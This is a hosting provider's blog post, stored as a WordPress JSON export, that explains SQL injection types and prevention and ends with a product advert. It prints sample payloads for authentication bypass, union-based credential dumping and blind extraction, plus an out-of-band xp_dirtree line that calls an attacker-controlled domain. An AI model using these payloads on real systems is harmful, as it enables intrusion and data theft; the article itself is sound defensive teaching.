{"id":17056,"date":"2025-10-23T09:19:42","date_gmt":"2025-10-23T08:19:42","guid":{"rendered":"https:\/\/www.20i.com\/blog\/?p=17056"},"modified":"2025-10-23T10:35:27","modified_gmt":"2025-10-23T09:35:27","slug":"sql-injection","status":"publish","type":"post","link":"https:\/\/www.20i.com\/blog\/sql-injection\/","title":{"rendered":"SQL Injection: What It Is, Why It\u2019s Dangerous and How to Prevent It\u00a0"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">SQL Injection, also known as SQLi, has been on the <a href=\"https:\/\/owasp.org\/www-project-top-ten\/\" target=\"_blank\" rel=\"noreferrer noopener\">OWASP Top 10<\/a> for years, and for very good reason. Despite being a well-documented vulnerability, it remains one of the most exploited threats facing websites today.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this post, we\u2019ll explore what SQL Injection is, how it works, variations of SQLi, how to prevent it, and how we protect your websites against it.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>What is SQL Injection?<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SQL Injection is a type of cyber-attack that allows an attacker to interfere with the queries a website makes to its database.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">If users\u2019 input is improperly handled, attackers can manipulate SQL statements to expose or alter sensitive data and even gain full control over the database in extreme cases.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>A Simple Example<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Consider this (vulnerable) PHP snippet:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$username = $_GET&#091;'user'];&nbsp;\n$query = \"SELECT * FROM users WHERE username = '$username'\";&nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">An attacker could supply input like:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' OR '1'='1&nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Which would transform the query into:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM users WHERE username = '' OR '1'='1'&nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This query will return all users, bypassing authentication altogether.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"601\" height=\"401\" src=\"https:\/\/www.20i.com\/blog\/wp-content\/uploads\/2025\/10\/inner.png\" alt=\"functioning of an sql injection\" class=\"wp-image-17058\" srcset=\"https:\/\/www.20i.com\/blog\/wp-content\/uploads\/2025\/10\/inner.png 601w, https:\/\/www.20i.com\/blog\/wp-content\/smush-webp\/2025\/10\/inner-300x200.png.webp 300w, https:\/\/www.20i.com\/blog\/wp-content\/smush-webp\/2025\/10\/inner-400x267.png.webp 400w, https:\/\/www.20i.com\/blog\/wp-content\/smush-webp\/2025\/10\/inner-150x100.png.webp 150w\" sizes=\"auto, (max-width: 601px) 100vw, 601px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>The Different Types of SQL Injection<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SQL Injection is a vulnerability that can be exploited in various ways, depending on factors such as the application&#8217;s architecture, the underlying database system, and the implementation of error handling.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Broadly, SQLi can be categorised into three main types:&nbsp;&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In-Band&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Blind&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Out-of-Band&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Each of these has sub-techniques that exploit specific behaviours of the target system.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>In-Band (Classic) SQLi<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">In-Band SQLi is the most straightforward and commonly exploited form of SQLi.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here, the attacker uses the same communication channel for both injecting malicious SQL and retrieving results.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This type of SQLi is often possible when the application fails to sanitise input and directly reflects query output in the user interface.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Error-Based SQLi<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">This method relies on the database returning detailed error messages when invalid queries are executed. An attacker deliberately causes errors to reveal critical information about the database structure, such as table names, column names, or even the underlying database technology (e.g., <a href=\"https:\/\/www.mysql.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">MySQL<\/a>, <a href=\"https:\/\/www.microsoft.com\/en-gb\/sql-server\" target=\"_blank\" rel=\"noreferrer noopener\">MSSQL<\/a>, <a href=\"https:\/\/www.oracle.com\/uk\/database\/\" target=\"_blank\" rel=\"noreferrer noopener\">Oracle<\/a>).&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Example input:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' AND 1=CONVERT(int, (SELECT TOP 1 name FROM sysobjects)) -- &nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If the application displays SQL errors, this input could leak the first table name from the \u2018sysobjects\u2019 system table in SQL Server.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Often used for reconnaissance as a precursor to more sophisticated attacks by mapping the database schema and discovering which SQLi attacks the database may be vulnerable to.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Union-Based SQLi<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Union-based SQLi leverages the \u2018UNION SQL\u2019 operator to combine the results of two \u2018SELECT\u2019 statements. If the original query returns data to the page, and the number and data types of columns match, attackers can piggyback their own query and display its results.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Example input:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' UNION SELECT username, password FROM users -- &nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If successful, the attacker will see usernames and passwords displayed directly on the page, making this an efficient method for data extraction.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Commonly used for fast and effective data extraction when output is reflected in the application.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Blind SQL Injection<\/strong>&nbsp;<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">In Blind SQLi, the application doesn\u2019t display database errors or return query results directly. The attacker can still infer information by observing subtle changes in behaviour, such as different page content, response status codes, or delays in response time.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Boolean-Based Blind SQLi<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">This technique sends payloads that evaluate to either true or false and observes the application&#8217;s response. For example, an attacker may compare two values and monitor whether the page loads normally or throws an error.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Example input:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' AND 1=1 --&nbsp;&nbsp; \/\/ Page loads normally&nbsp; &nbsp;\n' AND 1=2 --&nbsp;&nbsp; \/\/ Page behaves differently&nbsp; &nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">By adjusting the query, the attacker can iteratively extract information one bit at a time, such as by asking whether the first character of a password is &#8216;a&#8217;, &#8216;b&#8217;, etc.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Time-Based Blind SQLi<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">In time-based attacks, the attacker introduces a deliberate delay using database functions (e.g., \u2018SLEEP()\u2019 in MySQL or \u2018WAITFOR DELAY\u2019 in MSSQL) and measures the response time. A delayed response suggests a true condition.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Example input:<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' AND IF(SUBSTRING(@@version,1,1)='M', SLEEP(5), 0) --&nbsp; &nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If the response is delayed by 5 seconds, the attacker infers that the first character of the database management system version is \u2018M\u2019, likely indicating MySQL.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Commonly used to extract data when there is no visible output or error handling.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Out-of-Band (OOB) SQL Injection<\/strong>&nbsp;<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Out-of-Band SQLi is less common but extremely powerful.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It occurs when the attacker cannot retrieve data through the application&#8217;s response or timing side channels but can force the database to make external requests (e.g., via DNS or HTTP).&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This type of SQLi is often used in highly secure environments where direct output is blocked, and blind techniques are ineffective.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Example input (SQL Server):<\/strong>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>'; EXEC master..xp_dirtree('\/\/attacker-controlled-domain.com\/folder') -- &nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This causes the database server to make a DNS (Domain Name System) query or SMB (Server Message Block) connection to a server under the attacker\u2019s control, confirming code execution and potentially leaking information.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">OOB SQLi is used for exfiltrating data through DNS\/HTTP when all other channels are filtered or sanitised.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Real-World Impact<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SQL Injection can lead to devastating consequences:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Data Theft<\/strong>: Exposing personal information, login credentials, payment records.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Data Manipulation<\/strong>: Altering, inserting, or deleting critical data.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Authentication Bypass<\/strong>: Logging in as any user, including admin.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Full Database Dumping<\/strong>: Extracting entire tables or databases.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Remote Code Execution<\/strong>: In severe cases, executing OS-level commands.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>How to Prevent SQL Injection<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SQLi is entirely preventable with secure development practices and by opting to choose a secure host.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Use Parameterised Queries (Prepared Statements)<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">This is your first and best line of defence and parameterised queries ensure that user input is treated as data and never as part of the SQL command.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">if the user inputs &#8216; OR 1=1 &#8211;, it is not interpreted as SQL. It\u2019s treated as a literal string &#8220;&#8216; OR 1=1 &#8211;&#8220;, preventing the query from executing and returning sensitive data.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Example using PDO in PHP:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$stmt = $pdo-&gt;prepare(\"SELECT * FROM users WHERE username = ?\");&nbsp;\n$stmt-&gt;execute(&#091;$username]);&nbsp;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Available in:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>PHP<\/strong>: PDO, MySQLi&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Python<\/strong>: psycopg2, SQLAlchemy&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Java<\/strong>: PreparedStatement&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Node.js<\/strong>: mysql2, pg&nbsp;<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Leverage ORMs (Object-Relational Mappers)<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Frameworks like Django ORM, Hibernate, or Entity Framework abstract SQL logic and handle escaping\/sanitisation automatically.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Input Validation<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Validate input for expected formats, lengths, types, values, and use allow-lists where possible.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Follow the Principle of Least Privilege<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Ensure the application connects to the database with minimal necessary privileges. For example, avoid using root\/admin credentials in production.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Suppress Detailed Errors in Production<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">Verbose SQL errors help attackers by giving them information on the database system, which help to plan further attacks. If the attacker doesn\u2019t know what they\u2019re attacking, it will greatly reduce the success of the attack.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Log SQL errors securely for internal use but never show raw database errors to users.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Use Web Application Firewalls (WAFs)<\/strong>&nbsp;<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">WAFs like <a href=\"https:\/\/www.20i.com\/web-application-firewall\" target=\"_blank\" rel=\"noreferrer noopener\">20i WAF<\/a>, <a href=\"http:\/\/sucuri.net\/\" target=\"_blank\" rel=\"noreferrer noopener\">Securi<\/a>, <a href=\"https:\/\/aws.amazon.com\/waf\/\" target=\"_blank\" rel=\"noreferrer noopener\">AWS WAF<\/a>, or <a href=\"https:\/\/www.20i.com\/blog\/modsec\/\" target=\"_blank\" rel=\"noreferrer noopener\">ModSecurity<\/a> can block known SQLi patterns automatically preventing them from ever reaching the database.&nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\"><strong>Regularly Test Your Code<\/strong>&nbsp;<\/h5>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Use tools like <a href=\"https:\/\/owasp.org\/www-chapter-dorset\/assets\/presentations\/2020-01\/20200120-OWASPDorset-ZAP-DanielW.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">OWASP ZAP<\/a>, <a href=\"https:\/\/portswigger.net\/burp\/pro\" target=\"_blank\" rel=\"noreferrer noopener\">Burp Suite<\/a>, or <a href=\"https:\/\/sqlmap.org\/\" target=\"_blank\" rel=\"noreferrer noopener\">SQLMap<\/a> to find vulnerabilities.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Conduct penetration testing and secure code reviews.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Monitor logs for suspicious SQL activity.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>How 20i Prevents SQL Injection<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">At 20i, we integrate multiple layers of defence to proactively stop SQL injection attempts before they reach your application:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>WAF Protection<\/strong>: Our <a href=\"https:\/\/www.20i.com\/web-application-firewall\" target=\"_blank\" rel=\"noreferrer noopener\">Web Application Firewall<\/a> automatically detects and blocks malicious query patterns commonly used in SQLi attacks.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Security Rule Sets<\/strong>: Our platforms are hardened with <a href=\"https:\/\/owasp.org\/www-project-modsecurity-core-rule-set\/\" target=\"_blank\" rel=\"noreferrer noopener\">OWASP CRS<\/a> (Core Rule Set) to mitigate injection-based attacks through ModSecurity.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Isolation by Design<\/strong>: Each hosting environment is containerised, meaning one website or database cannot negatively impact another. This reduces the impact radius of any vulnerability.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Patch Management<\/strong>: We keep server software up to date to eliminate known SQLi vulnerabilities.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Final Thoughts<\/strong>&nbsp;<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SQL injection might be one of the oldest vulnerabilities around, but it&#8217;s still commonly used to compromise modern websites, especially those running on outdated code or legacy systems that haven&#8217;t been properly maintained.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">With a solid understanding of how SQLi works and by following secure coding practices, it can be avoided altogether. And by hosting your site with a security-focused provider like 20i, you\u2019ll have an extra line of defence that helps stop attacks before they even get close.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">At 20i, we believe that security isn\u2019t just about having the right tools in place; it\u2019s about staying ahead of the curve and bolstering our security suite.<\/p>\n\n\n<div class='code-block code-block-3' style='margin: 8px 0; clear: both;'>\n<hr>\n<br \/>\n<H4>Upgrade your hosting \ud83d\udcc8 Unleash your websites \ud83d\ude80<\/h4>\n<p>Build, deploy & manage all your sites\/apps at scale. Use our high-spec cloud servers to ensure blazing-fast load times, every time. Get market-leading speed, security & customer support.<\/p>\n<ul>\n<li>WordPress, WooCommerce, Laravel optimisations &amp; more<\/li>\n<li>One click migration from any host, any time<\/li>\n<li>Free Email, DNS, CDN, SSL, SSH, Backups, Security &amp; Git integration all baked-in<\/li>\n<li>Global reach with 60+ global data centres<\/li>\n<li>Award-winning support from real people<\/li>\n<\/ul>\n<p>Find out why over 1 million agencies, online stores, developers, multi-site hosting and high traffic sites use our <a href=\"https:\/\/www.20i.com\/managed-cloud-servers\">Managed Cloud Servers<\/a> to ensure peak performance, every time.<\/p>\n<br \/><br \/>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"Learn about SQL injection, what it is, why it&#8217;s dangerous, and how to prevent it.","protected":false},"author":34,"featured_media":17060,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"csco_singular_sidebar":"","csco_page_header_type":"","csco_page_load_nextpost":"","footnotes":""},"categories":[288,51],"tags":[],"class_list":["post-17056","post","type-post","status-publish","format-standard","has-post-thumbnail","category-security","category-technology","cs-entry"],"_links":{"self":[{"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/posts\/17056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/users\/34"}],"replies":[{"embeddable":true,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/comments?post=17056"}],"version-history":[{"count":3,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/posts\/17056\/revisions"}],"predecessor-version":[{"id":17302,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/posts\/17056\/revisions\/17302"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/media\/17060"}],"wp:attachment":[{"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/media?parent=17056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/categories?post=17056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.20i.com\/blog\/wp-json\/wp\/v2\/tags?post=17056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}